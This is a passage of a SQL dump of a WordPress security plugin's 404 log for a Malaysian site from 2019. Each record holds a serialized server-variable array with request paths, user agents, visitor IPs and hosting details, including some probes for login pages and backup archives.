05:34:48',35463616,37274432,'https://bintara.com.my/?page_id=18',1,0,'204.152.200.243'),(27904,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.150.139.189\";s:11:\"REMOTE_PORT\";s:5:\"38590\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAjF20pAioKYUFEOtCQnAAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570775831.489\";s:12:\"REQUEST_TIME\";s:10:\"1570775831\";}}','notice','2019-10-11 06:37:13','2019-10-11 06:37:11',35455600,37271528,'https://bintara.com.my/?page_id=18',1,0,'178.150.139.189'),(27905,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/D3117A87\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"88.214.11.71\";s:11:\"REMOTE_PORT\";s:5:\"49148\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAqwCuNlhOpg688@F7oygAAAYE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570777792.4317\";s:12:\"REQUEST_TIME\";s:10:\"1570777792\";}}','notice','2019-10-11 07:09:55','2019-10-11 07:09:52',35418416,37224912,'https://bintara.com.my/?page_id=18',1,0,'88.214.11.71'),(27906,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/admin/login.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaAt6PEE7V3YcGZC1KbjoQAAAUU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaAt6PEE7V3YcGZC1KbjoQAAAUU\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaAt6PEE7V3YcGZC1KbjoQAAAUU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"46.105.99.163\";s:11:\"REMOTE_PORT\";s:5:\"57344\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaAt6PEE7V3YcGZC1KbjoQAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570778601.0486\";s:12:\"REQUEST_TIME\";s:10:\"1570778601\";}}','notice','2019-10-11 07:23:24','2019-10-11 07:23:22',35025816,36828016,'https://bintara.com.my/admin/login.php',1,0,'46.105.99.163'),(27907,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaA@QPEE7V3YcGZC1KbopAAAAU4\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:13:\"40.77.167.100\";s:11:\"REMOTE_PORT\";s:4:\"8166\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaA@QPEE7V3YcGZC1KbopAAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570782785.0012\";s:12:\"REQUEST_TIME\";s:10:\"1570782785\";}}','notice','2019-10-11 08:33:11','2019-10-11 08:33:06',34304856,36110152,'https://bintara.com.my/information-security/',1,0,'40.77.167.100'),(27908,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"217.170.192.245\";s:11:\"REMOTE_PORT\";s:5:\"55491\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XaBE9G0pAioKYUFEOtClcAAAAck\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570784500.4031\";s:12:\"REQUEST_TIME\";s:10:\"1570784500\";}}','notice','2019-10-11 09:01:42','2019-10-11 09:01:40',35028704,36843848,'https://bintara.com.my/?page_id=18',1,0,'217.170.192.245'),(27909,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A58D87CC-A8BD-4B74-A1DE-CE61FE02B46D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaBgS28ZiIu6tWuksp5uCAAAAMs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"61628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaBgS28ZiIu6tWuksp5uCAAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570791499.4741\";s:12:\"REQUEST_TIME\";s:10:\"1570791499\";}}','notice','2019-10-11 10:58:21','2019-10-11 10:58:19',35339216,37143520,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27910,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"195-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"247355FA-552A-4024-A066-F0CB7A371312\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"195-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaBiT28ZiIu6tWuksp5vsAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"53084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaBiT28ZiIu6tWuksp5vsAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570792015.4339\";s:12:\"REQUEST_TIME\";s:10:\"1570792015\";}}','notice','2019-10-11 11:06:58','2019-10-11 11:06:55',35743504,37541400,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.119'),(27170,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/blog/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 forward.http.proxy:3128\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/blog/site.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/blog/site.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTigAAAIM\";s:12:\"REDIRECT_URL\";s:14:\"/blog/site.zip\";s:11:\"REMOTE_ADDR\";s:15:\"103.133.215.103\";s:11:\"REMOTE_PORT\";s:5:\"52600\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/blog/site.zip\";s:10:\"SCRIPT_URL\";s:14:\"/blog/site.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5LIqTYgRwQdJ@9I7BTigAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606435.5217\";s:12:\"REQUEST_TIME\";s:10:\"1569606435\";}}','notice','2019-09-27 17:48:17','2019-09-27 17:47:17',35515392,37309496,'http://bintara.com.my/blog/site.zip',1,0,'103.133.215.103'),(27171,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/website/site.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"HTTP/1.1 